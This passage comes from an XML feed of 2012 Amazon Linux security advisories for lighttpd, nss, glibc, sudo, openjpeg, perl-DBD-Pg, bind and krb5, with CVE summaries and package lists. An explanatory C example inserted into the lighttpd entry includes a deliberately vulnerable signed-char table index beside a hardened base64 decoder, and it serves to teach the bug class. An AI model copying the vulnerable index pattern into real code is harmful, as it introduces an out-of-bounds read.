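With width=2, height=2, depth=-1, bpp=1 the unchecked product is 4294967292 bytes rather than an error; the checked version returns 0 for that input and for a product that exceeds size_t, and 921600 for a plausible 640x480x3 tile.
]]>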
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2088" title="" id="CVE-2012-2088" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2113" title="" id="CVE-2012-2113" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1054.html" title="" id="RHSA-2012:1054" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libtiff-devel" version="3.9.4" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-3.9.4-6.10.amzn1.i686.rpm</filename></package><package name="libtiff" version="3.9.4" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-3.9.4-6.10.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-3.9.4-6.10.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-3.9.4-6.10.amzn1.i686.rpm</filename></package><package name="libtiff" version="3.9.4" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-3.9.4-6.10.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-3.9.4-6.10.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-3.9.4-6.10.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-3.9.4-6.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2012-107</id><title>Amazon Linux - ALAS-2012-107: medium priority package update for lighttpd</title><issued date="2012-07-09 14:20:00" /><updated date="2014-09-14 16:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4362:
Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.
758624:
CVE-2011-4362 lighttpd: Out of bounds read due to a signedness error (DoS, crash)
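<![CDATA[
Added example for the lighttpd entry above; this is not lighttpd's code. It shows the signedness bug class in isolation: a base64 decoder that indexes its reverse table with a plain char turns input bytes 0x80..0xFF into negative indices on platforms where char is signed (x86 with glibc), reading before the start of the table. The hardened index widens through unsigned char, and the decoder built on it rejects such bytes instead of looking them up. Table, function names and sample inputs are constructed for the example.

```c
/* Added example (not lighttpd's code) of the signedness bug class behind
 * CVE-2011-4362: indexing a decode table with a plain `char`. Names are
 * invented for the example. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static signed char b64_table[256];   /* 0..63 for the base64 alphabet, -1 otherwise */
static int b64_ready;

static void b64_init(void)
{
    const char *alphabet =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    memset(b64_table, -1, sizeof b64_table);
    for (int i = 0; i < 64; i++)
        b64_table[(unsigned char)alphabet[i]] = (signed char)i;
    b64_ready = 1;
}

/* Vulnerable shape: where `char` is signed, an input byte of 0x80..0xFF
 * converts to a negative int, and table[index] then reads memory before
 * the start of the table (a segfault in the advisory's wording). */
int b64_index_vulnerable(signed char c)
{
    return (int)c;                       /* 0xFF -> -1 */
}

/* Hardened: widen through unsigned char first, so the index is always
 * 0..255 and every non-alphabet byte lands on a -1 slot. */
int b64_index_hardened(char c)
{
    return (int)(unsigned char)c;        /* 0xFF -> 255 */
}

/* Decoder built on the hardened index. Returns bytes written, or -1 on any
 * byte outside the alphabet (so a high-bit byte is rejected, not looked up
 * at a negative offset) or when the output buffer is too small. */
long b64_decode_hardened(const char *in, size_t inlen, unsigned char *out, size_t outcap)
{
    uint32_t acc = 0;
    int bits = 0;
    size_t n = 0;
    if (!b64_ready) b64_init();
    for (size_t i = 0; i < inlen; i++) {
        int v;
        if (in[i] == '=') break;                     /* padding: stop */
        v = b64_table[b64_index_hardened(in[i])];
        if (v < 0) return -1;
        acc = (acc << 6) | (uint32_t)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= outcap) return -1;
            out[n++] = (unsigned char)((acc >> bits) & 0xFF);
        }
    }
    return (long)n;
}

/* Constructed inputs: a valid string and one carrying a 0xFF byte, the kind
 * of value that would have produced a negative table index. */
int b64_demo_hello(void)
{
    unsigned char buf[16];
    long n = b64_decode_hardened("aGVsbG8=", 8, buf, sizeof buf);
    return n == 5 && memcmp(buf, "hello", 5) == 0;
}

int b64_demo_rejects_high_byte(void)
{
    const char bad[] = { 'a', 'G', (char)0xFF, 'z' };
    unsigned char buf[16];
    return b64_decode_hardened(bad, sizeof bad, buf, sizeof buf) == -1;
}
```

Whether the vulnerable index is negative depends on the ABI: char is signed on x86 and x86_64 (the architectures shipped in this advisory) but unsigned on ARM, which is why a decoder can pass tests on one platform and crash on another. Casting through unsigned char removes the dependency.
]]>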
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4362" title="" id="CVE-2011-4362" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="lighttpd-fastcgi" version="1.4.31" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.31-1.2.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.31" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.31" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.31-1.2.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.31" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.31-1.2.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.31" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.31-1.2.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.31" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.31-1.2.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.31" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.31-1.2.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.31" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.31-1.2.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.31" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.31-1.2.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.31" release="1.2.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-108</id><title>Amazon Linux - ALAS-2012-108: medium priority package update for nss</title><issued date="2012-07-25 17:55:00" /><updated date="2014-09-14 16:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0441:
The ASN.1 decoder in the QuickDER decoder in Mozilla Network Security Services (NSS) before 3.13.4, as used in Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10, allows remote attackers to cause a denial of service (application crash) via a zero-length item, as demonstrated by (1) a zero-length basic constraint or (2) a zero-length field in an OCSP response.
A flaw was found in the way the ASN.1 (Abstract Syntax Notation One) decoder in NSS handled zero length items. This flaw could cause the decoder to incorrectly skip or replace certain items with a default value, or could cause an application to crash if, for example, it received a specially-crafted OCSP (Online Certificate Status Protocol) response.
827833:
CVE-2012-0441 nss: NSS parsing errors with zero length items
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0441" title="" id="CVE-2012-0441" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1091.html" title="" id="RHSA-2012:1091" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nss" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.13.5-1.26.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.13.5-1.26.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.13.5-1.26.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.5" release="1.26.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.13.5-1.26.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.13.5-1.26.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.13.5-1.26.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-109</id><title>Amazon Linux - ALAS-2012-109: medium priority package update for glibc</title><issued date="2012-07-25 17:56:00" /><updated date="2014-09-14 16:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3406:
Multiple errors in glibc's formatted printing functionality could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort.
It was discovered that the formatted printing functionality in glibc did not properly restrict the use of alloca(). This could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort.
826943:
CVE-2012-3406 glibc: printf() unbound alloca() usage in case of positional parameters + many format specs
CVE-2012-3405:
Multiple errors in glibc's formatted printing functionality could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort.
833704:
CVE-2012-3405 glibc: incorrect use of extend_alloca() in formatted printing can lead to FORTIFY_SOURCE format string protection bypass
CVE-2012-3404:
Multiple errors in glibc's formatted printing functionality could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort.
833703:
CVE-2012-3404 glibc: incorrect size calculation in formatted printing can lead to FORTIFY_SOURCE format string protection bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3404" title="" id="CVE-2012-3404" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3405" title="" id="CVE-2012-3405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3406" title="" id="CVE-2012-3406" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1098.html" title="" id="RHSA-2012:1098" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="glibc-common" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.80.40.amzn1" 
epoch="0" arch="i686"><filename>Packages/glibc-devel-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.12-1.80.40.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-110</id><title>Amazon Linux - ALAS-2012-110: medium priority package update for sudo</title><issued date="2012-07-25 18:00:00" /><updated date="2014-09-14 16:47:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2337:
sudo 1.6.x and 1.7.x before 1.7.9p1, and 1.8.x before 1.8.4p5, does not properly support configurations that use a netmask syntax, which allows local users to bypass intended command restrictions in opportunistic circumstances by executing a command on a host that has an IPv4 address.
A flaw was found in the way the network matching code in sudo handled multiple IP networks listed in user specification configuration directives. A user, who is authorized to run commands with sudo on specific hosts, could use this flaw to bypass intended restrictions and run those commands on hosts not matched by any of the network specifications.
820677:
CVE-2012-2337 sudo: Multiple netmask values used in Host / Host_List configuration cause any host to be allowed access
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2337" title="" id="CVE-2012-2337" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1081.html" title="" id="RHSA-2012:1081" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="sudo-debuginfo" version="1.7.4p5" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.7.4p5-12.14.amzn1.i686.rpm</filename></package><package name="sudo" version="1.7.4p5" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.7.4p5-12.14.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.7.4p5" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.7.4p5-12.14.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.7.4p5" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.7.4p5-12.14.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-111</id><title>Amazon Linux - ALAS-2012-111: important priority package update for openjpeg</title><issued date="2012-07-30 16:35:00" /><updated date="2014-09-14 16:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3358:
Multiple heap-based buffer overflows in the j2k_read_sot function in j2k.c in OpenJPEG 1.5 allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted (1) tile number or (2) tile length in a JPEG 2000 image file.
An input validation flaw, leading to a heap-based buffer overflow, was found in the way OpenJPEG handled the tile number and size in an image tile header. A remote attacker could provide a specially-crafted image file that, when decoded using an application linked against OpenJPEG, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
835767:
CVE-2012-3358 openjpeg: heap-based buffer overflow when processing JPEG2000 image files
CVE-2009-5030:
The tcd_free_encode function in tcd.c in OpenJPEG 1.3 through 1.5 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via crafted tile information in a Gray16 TIFF image, which causes insufficient memory to be allocated and leads to an "invalid free."
OpenJPEG allocated insufficient memory when encoding JPEG 2000 files from input images that have certain color depths. A remote attacker could provide a specially-crafted image file that, when opened in an application linked against OpenJPEG (such as image_to_j2k), would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
812317:
CVE-2009-5030 openjpeg: Heap memory corruption leading to invalid free by processing certain Gray16 TIFF images
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5030" title="" id="CVE-2009-5030" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3358" title="" id="CVE-2012-3358" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1068.html" title="" id="RHSA-2012:1068" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openjpeg" version="1.3" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-1.3-8.5.amzn1.i686.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-devel-1.3-8.5.amzn1.i686.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-libs-1.3-8.5.amzn1.i686.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-debuginfo-1.3-8.5.amzn1.i686.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-debuginfo-1.3-8.5.amzn1.x86_64.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-libs-1.3-8.5.amzn1.x86_64.rpm</filename></package><package name="openjpeg" version="1.3" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-1.3-8.5.amzn1.x86_64.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-devel-1.3-8.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-112</id><title>Amazon Linux - ALAS-2012-112: medium 
priority package update for perl-DBD-Pg</title><issued date="2012-08-03 13:50:00" /><updated date="2014-09-14 16:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1151:
Two format string flaws were found in perl-DBD-Pg. A specially-crafted database warning or error message from a server could cause an application using perl-DBD-Pg to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
Multiple format string vulnerabilities in dbdimp.c in DBD::Pg (aka DBD-Pg or libdbd-pg-perl) module before 2.19.0 for Perl allow remote PostgreSQL database servers to cause a denial of service (process crash) via format string specifiers in (1) a crafted database warning to the pg_warn function or (2) a crafted DBD statement to the dbd_st_prepare function.
801733:
CVE-2012-1151 perl-DBD-Pg: Format string flaws by turning db notices into Perl warnings and by preparing DBD statement
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1151" title="" id="CVE-2012-1151" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1116.html" title="" id="RHSA-2012:1116" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="perl-DBD-Pg" version="2.15.1" release="4.3.amzn1" epoch="0" arch="i686"><filename>Packages/perl-DBD-Pg-2.15.1-4.3.amzn1.i686.rpm</filename></package><package name="perl-DBD-Pg-debuginfo" version="2.15.1" release="4.3.amzn1" epoch="0" arch="i686"><filename>Packages/perl-DBD-Pg-debuginfo-2.15.1-4.3.amzn1.i686.rpm</filename></package><package name="perl-DBD-Pg-debuginfo" version="2.15.1" release="4.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-DBD-Pg-debuginfo-2.15.1-4.3.amzn1.x86_64.rpm</filename></package><package name="perl-DBD-Pg" version="2.15.1" release="4.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-DBD-Pg-2.15.1-4.3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-113</id><title>Amazon Linux - ALAS-2012-113: important priority package update for bind</title><issued date="2012-08-03 15:55:00" /><updated date="2014-09-14 16:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3817:
ISC BIND 9.4.x, 9.5.x, 9.6.x, and 9.7.x before 9.7.6-P2; 9.8.x before 9.8.3-P2; 9.9.x before 9.9.1-P2; and 9.6-ESV before 9.6-ESV-R7-P2, when DNSSEC validation is enabled, does not properly initialize the failing-query cache, which allows remote attackers to cause a denial of service (assertion failure and daemon exit) by sending many queries.
An uninitialized data structure use flaw was found in BIND when DNSSEC validation was enabled. A remote attacker able to send a large number of queries to a DNSSEC validating BIND resolver could use this flaw to cause it to exit unexpectedly with an assertion failure.
842897:
CVE-2012-3817 bind: heavy DNSSEC validation load can cause assertion failure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3817" title="" id="CVE-2012-3817" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1123.html" title="" id="RHSA-2012:1123" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind-libs" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.23.amzn1" 
epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-114</id><title>Amazon Linux - ALAS-2012-114: important priority package update for krb5</title><issued date="2012-08-03 15:55:00" /><updated date="2014-09-14 16:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1015:
The kdc_handle_protected_negotiation function in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.8.x, 1.9.x before 1.9.5, and 1.10.x before 1.10.3 attempts to calculate a checksum before verifying that the key type is appropriate for a checksum, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free, heap memory corruption, and daemon crash) via a crafted AS-REQ request.
An uninitialized pointer use flaw was found in the way the MIT Kerberos KDC handled initial authentication requests (AS-REQ). A remote, unauthenticated attacker could use this flaw to crash the KDC via a specially-crafted AS-REQ request.
838012:
CVE-2012-1015 krb5: KDC daemon crash via free() of an uninitialized pointer
CVE-2012-1013:
The check_1_6_dummy function in lib/kadm5/srv/svr_principal.c in kadmind in MIT Kerberos 5 (aka krb5) 1.8.x, 1.9.x, and 1.10.x before 1.10.2 allows remote authenticated administrators to cause a denial of service (NULL pointer dereference and daemon crash) via a KRB5_KDB_DISALLOW_ALL_TIX create request that lacks a password.
A NULL pointer dereference flaw was found in the MIT Kerberos administration daemon, kadmind. A Kerberos administrator who has the "create" privilege could use this flaw to crash kadmind.
827517:
CVE-2012-1013 krb5: kadmind denial of service
